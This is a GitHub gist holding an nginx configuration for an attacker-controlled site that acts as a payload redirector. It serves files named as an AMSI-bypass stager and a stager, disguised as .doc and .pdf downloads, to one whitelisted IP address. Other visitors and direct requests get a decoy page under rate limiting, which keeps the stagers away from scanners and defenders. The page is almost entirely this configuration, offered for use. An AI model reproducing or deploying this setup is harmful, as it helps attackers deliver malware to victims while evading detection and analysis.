Skip to content

Instantly share code, notes, and snippets.

@CalfCrusher
Created November 12, 2023 10:05
Show Gist options
  • Save CalfCrusher/2c08d12208215aafc9a3479378db1c9b to your computer and use it in GitHub Desktop.
Save CalfCrusher/2c08d12208215aafc9a3479378db1c9b to your computer and use it in GitHub Desktop.
Nginx as redirector for payloads
limit_req_zone $binary_remote_addr zone=req_zone:10m rate=5r/m;
server {
root /var/www/attacker-site.com/html;
index index.html;
server_name attacker-site.com www.attacker-site.com;
location / {
try_files $uri $uri/ =404;
}
location = /bypassamsiandrequeststager.txt {
limit_req zone=req_zone burst=4 nodelay;
alias /var/www/attacker-site.com/html/theyshallnotpass.html;
}
location = /stager.txt {
limit_req zone=req_zone burst=4 nodelay;
alias /var/www/attacker-site.com/html/theyshallnotpass.html;
}
location ~ \.doc$ {
if ($remote_addr = XXX.XXX.XXX.XXX) {
alias /var/www/attacker-site.com/html/bypassamsiandrequeststager.txt;
}
}
location ~ \.pdf$ {
if ($remote_addr = XXX.XXX.XXX.XXX) {
alias /var/www/attacker-site.com/html/stager.txt;
}
}
listen [::]:443 ssl ipv6only=on;
listen 443 ssl;
ssl_certificate /etc/letsencrypt/live/attacker-site.com/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/attacker-site.com/privkey.pem;
include /etc/letsencrypt/options-ssl-nginx.conf;
ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem;
}
server {
if ($host = www.attacker-site.com) {
return 301 https://$host$request_uri;
}
if ($host = attacker-site.com) {
return 301 https://$host$request_uri;
}
listen 80;
listen [::]:80;
server_name attacker-site.com www.attacker-site.com;
return 404;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment